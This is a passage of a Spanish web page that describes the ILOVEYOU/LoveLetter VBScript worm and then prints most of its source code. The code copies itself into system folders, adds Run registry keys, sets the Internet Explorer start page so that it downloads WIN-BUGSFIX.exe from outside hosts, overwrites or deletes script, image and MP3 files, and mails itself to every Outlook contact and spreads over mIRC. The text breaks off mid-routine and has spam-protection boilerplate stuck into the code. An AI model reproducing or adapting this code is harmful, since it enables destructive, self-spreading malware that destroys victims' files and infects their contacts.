automaticamente al inicializar el sistema:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL
Crea los siguientes archivos:
MSKERNEL32.VBS, LOVE --> En \windows\System
LETTER-FOR-YOU.VBS --> En \windows\system
WIN32DLL.VBS --> en \windows
Luego de estas acciones elige un numero aleatorio entre 1 y 4, segun el
obtenido pone una pagina de inicio en Internet Explorer. Las 4 direcciones
van hacia la pagina con la intencion de bajar un
archivo llamado WIN-BUGSFIX.EXE, si este paso se cumple vuelve a poner una
pagina en blanco como inicio, tambien agrega otra clave al registro para
que este programa se ejecute automaticamente cada vez que se inicie el
sistema.Si el gusano ha conseguido realizar el paso anterior tambi‚n
deberemos. El archivo BUGSFIX.EXE esta ubicado en el directorio de descarga
del Internet Explorer.
La entrada del registro agregada es:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
WIN-BUGSFIX
Ahora examina el disco en busca del mirc, si lo halla sobreescribe el
fichero SCRIPT.INI para que cada vez que hablemos con alguien le envie
el virus:
n0=on 1:JOIN:#:{n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
n3=}
El virus comienza el proceso de sobreescribir los archivos con extensiones
.VBS y .VBE. Elimina. Los archivos con extensiones .JS, .JSE, .CSS, .WSH,
.SCT y .HTA, y crea otros con el mismo nombre y extensi¢n .VBS en el que
introduce su c¢digo.
Nuevamente busca los archivos con extensi¢n .JPG, .JPEG, .MP3 y .MP2,
los elimina, y crea un nuevo nombre que va estar formado por el nombre y
la extensi¢n anterior m s VBS como extencion real.
CODIGO FUENTE:
~~~~~~~~~~~~~
rem barok -loveletter(vbe)
rem by: spyder /
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
/
@GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern
el32",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService
s\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN
-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-
BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or
(ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will
corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not
run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-
FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead
("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from
me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML-?TITLE>"&vbcrlf& _
"
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
""&vbcrlf& _
"-?HEAD>
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
=#-#main#-#;window.open(#-
#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-
YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-
@>"&vbcrlf& _
"This HTML file need ActiveX Control-?p> To Enable to
read this HTML file - Please press #-#YES#-# button to Enable
ActiveX-?p>"&vbcrlf& _
"-?CENTER> |